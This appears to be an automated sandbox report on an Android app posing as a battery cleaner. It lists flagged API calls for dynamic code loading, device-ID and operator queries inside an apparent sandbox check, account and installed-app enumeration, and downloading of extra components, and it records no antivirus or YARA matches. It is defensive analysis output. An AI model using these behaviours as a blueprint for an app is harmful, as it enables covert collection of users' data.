Source: com.google.android.gms.internal.zzal;->zzm:203API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:206API Call: dalvik.system.DexClassLoader.loadClass (not executed)
Source: com.google.android.gms.internal.zzal;->zzm:209API Call: dalvik.system.DexClassLoader.loadClass (not executed)

Language, Device and Operating System Detection:

barindex
Queries the SIM provider name (SPN - Service Provider Name)Show sources
Source: unknownAPI Call: android.telephony.TelephonyManager.getSimOperatorName returned ""
Queries the network operator ISO country codeShow sources
Source: unknownAPI Call: android.telephony.TelephonyManager.getNetworkCountryIso returned ""
Queries the network operator numeric MCC+MNC (mobile country code + mobile network code)Show sources
Source: com.google.android.gms.internal.zzhj$zza;->zza:66API Call: android.telephony.TelephonyManager.getNetworkOperator returned "26203"
Queries the unqiue device ID (IMEI, MEID or ESN)Show sources
Source: eptdz.jhxonwlp.zdmg.Tools;->checkSandBox:150API Call: android.telephony.TelephonyManager.getDeviceId

Stealing of Sensitive Information:

barindex
Queries a list of installed applicationsShow sources
Source: mobile.cleaner.battery.heath.cleanmaster.ActivityFileManeger$LoadApplications;->doInBackground:10API Call: android.content.pm.PackageManager.getInstalledApplications
Queries camera informationShow sources
Source: com.google.android.gms.vision.CameraSource;->zzIb:8API Call: android.hardware.Camera.open
Source: com.google.android.gms.vision.CameraSource;->zza:97API Call: android.hardware.Camera.getCameraInfo
Source: com.google.android.gms.vision.CameraSource;->zzkp:124API Call: android.hardware.Camera.getNumberOfCameras
Source: com.google.android.gms.vision.CameraSource;->zzkp:125API Call: android.hardware.Camera.getCameraInfo
Queries stored mail and application accounts (e.g. Gmail or Whatsup)Show sources
Source: com.google.android.gms.appinvite.AppInviteInvitation$IntentBuilder;->setAccount:40API Call: android.accounts.Account.type
Source: com.google.android.gms.auth.api.credentials.IdentityProviders;->getIdentityProviderForAccount:5API Call: android.accounts.Account.type
Source: com.google.android.gms.auth.api.credentials.IdentityProviders;->getIdentityProviderForAccount:9API Call: android.accounts.Account.type
Source: com.google.android.gms.common.internal.zzf;->getAccountName:20API Call: android.accounts.Account.name
Source: com.google.android.gms.location.places.internal.zze;-><init>:5API Call: android.accounts.Account.name
Source: com.google.android.gms.location.places.internal.zzk;-><init>:5API Call: android.accounts.Account.name
Source: com.google.android.gms.signin.internal.zzh;->zzFN:8API Call: android.accounts.Account.name
Source: com.google.android.gms.plus.Plus$1;->zza:5API Call: android.accounts.Account.name
Source: com.google.android.gms.auth.api.signin.GoogleSignInOptions;->zzmJ:63API Call: android.accounts.Account.name

Remote Access Functionality:

barindex
Uses DownloadManager to fetch additional componentsShow sources
Source: com.google.android.gms.internal.zzfp$1;->onClick:10API Call: android.app.DownloadManager.enqueue

Antivirus Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.